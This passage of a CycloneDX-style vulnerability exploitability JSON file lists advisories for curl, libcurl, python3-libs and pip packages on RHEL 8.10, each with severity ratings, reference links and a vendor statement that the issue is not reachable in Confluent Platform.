          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6253",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "curl might erroneously pass on credentials for a first proxy to a second\nproxy.\n\nThis can happen when the following conditions are true:\n\n1. curl is setup to use specific different proxies for different URL schemes\n2. the first proxy needs credentials\n3. the second proxy uses no credentials\n4. while using the first proxy (using say `http://`), curl is asked to follow\n   a redirect to a URL using another scheme (say `https://`), accessed using a\n   second, different, proxy",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6253"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/11"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6253"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.json"
        },
        {
          "url": "https://hackerone.com/reports/3669637"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6253"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6253"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6276",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        319
      ],
      "description": "Using libcurl, when a custom `Host:` header is first set for an HTTP request\nand a second request is subsequently done using the same *easy handle* but\nwithout the custom `Host:` header set, the second request would use stale\ninformation and pass on cookies meant for the first host in the second\nrequest. Leak them.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6276"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2jc6-hc33-hv48"
        },
        {
          "url": "https://hackerone.com/reports/3671818"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6276"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6357",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        829
      ],
      "description": "pip prior to version 26.1 would run self-update check functionality after installing wheel files which required importing well-known Python modules names. These module imports were intentionally deferred to increase startup time of the pip CLI. The patch changes self-update functionality to run before wheels are installed to prevent newly-installed modules from being imported shortly after the installation of a wheel package. Users should still review package contents prior to installation.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6357"
        },
        {
